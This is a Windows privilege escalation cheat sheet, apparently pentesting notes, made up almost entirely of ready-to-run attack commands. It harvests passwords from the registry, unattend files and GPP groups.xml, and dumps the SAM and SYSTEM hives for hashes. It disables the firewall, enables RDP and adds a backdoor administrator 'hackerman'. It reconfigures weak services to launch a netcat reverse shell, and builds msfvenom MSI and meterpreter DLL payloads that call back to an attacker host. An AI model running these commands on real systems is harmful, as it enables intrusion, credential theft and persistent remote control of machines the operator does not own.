Windows Privilege Escalation
Basic Information
systeminfo
set
hostname
net users
net user user1
net localgroups
# Set path:
set PATH=%PATH%;C:\xamppFirewall
netsh firewall show state
netsh firewall show config
# Turn firewall off
netsh firewall set opmode disable
# allow RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fCleartext passwords
Windows autologin:
reg query "HKLM\SOFTWARE\Microsoft\WindowsNT\Currentversion\Winlogon"
VNC:
reg query "HKCU\Software\ORL\WinVNC3\Password"
SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
Putty:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Search for password in registry:
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /sFind files
dir /s /b /a | findstr filename
dir /s *pass* == *cred* == *vnc* == *config*
findstr /si password *.xml *.ini *.txt *.config
findstr /si pass *.xml *.ini *.txt *.configCheck these files
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
web.config
System and SAM:
windows\repair\SAM
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Kali command to get hashes:
samdump2 -o hashes.txt system.old sam.old
Windows\NTDS\ntds.ditWeak File Permissions
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *Reconfigure service parameters
Unquoted service paths
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """Weak service permissions
upload accesscheck from Sysinternals to find weak permissions
accesschk.exe -uwcqv "currentuser" *
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *
sq qc "vulnerableservicename"
Note the space after the equals sign and before the quotes when using sc config below
To reconfigure to send netcat reverse shell:
sc config SERVICENAME binpath= "C:\pathtonetcat\nc.exe -nvIPADDRESS PORT -e "C:\Windows\System32\cmd.exe"
sc config SERVICENAME obj= ".\LocalSystem" password= ""
To reconfigure to add privileged user:
sc config SERVICENAME binpath= "net user hackerman password /add"
sc stop SERVICENAME
sc start SERVICENAME
sc config SERVICENAME binpath= "net localgroup Administrators hackerman /add"
sc start SERVICENAMEInside Service
netstat /a
netstat -anoInsecure File/Folder Permissions
XP and older:
cacls filename
Vista and newer:
icacls "C:\Program Files (x86)\ProgramFolder\Subfolder"
Powershell:
Get-Acl | fl
Get-ChildItem | Get-AclCheck for AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If you get a return code then any package will install with admin privileges, install a malicious msi to do whatever you like
msfvenom -f msi-nouac -p windows/adduser USER=hackerman PASS=password -o add_user.msiInstalled software
tasklist /svc
net start
reg query HKEY_LOCAL_MACHINE\SOFTWARE
DRIVERQUERY
Look in:
C:\Program files
C:\Program files (x86)
Home directory of the user
Find version of OS via files such as explorer.exe and use pev on Kali
pev -p explorer.exeScheduled tasks
schtasks /query /fo LIST /v
C:\windows\tasks
Windows Scheduled Task Log:
c:\WINDOWS\SchedLgU.TxtDLL Hijacking
Examine processes, identify any which may be running as a higher privileged user
Download exe and examine to find any references of DLL loading with procmon from sysinternals
Set filters to the processname, result is NAME NOT FOUND, and Path ends with .dll
Check file permissions with icacls to see if any locations listed are able to be written to by current user
Create dll payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.60 lport=8989 -f dll > hijackable.dllAdd user and enable RDP
net user hackerman hack123 /add
net localgroup Administrators hackerman /add
net localgroup "Remote Desktop Users" hackerman /ADD
Enable RDP:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
If you get this error:
"ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized?
Failed to connect, CredSSP required by server.""
Add this reg key:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /fGroup Policy Preferences
Output environment-variables:
set
Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=DOMAIN.LOCAL
Look up ip-address:
nslookup nameofserver.domain.local
Mount SYSVOL
net use z: \\IPADDRESS\SYSVOL
Enter the mapped drive:
z:
Search for groups.xml file:
dir Groups.xml /s
Decrypt any passwords in Kali:
gpp-decrypt encryptedpasswordLast updated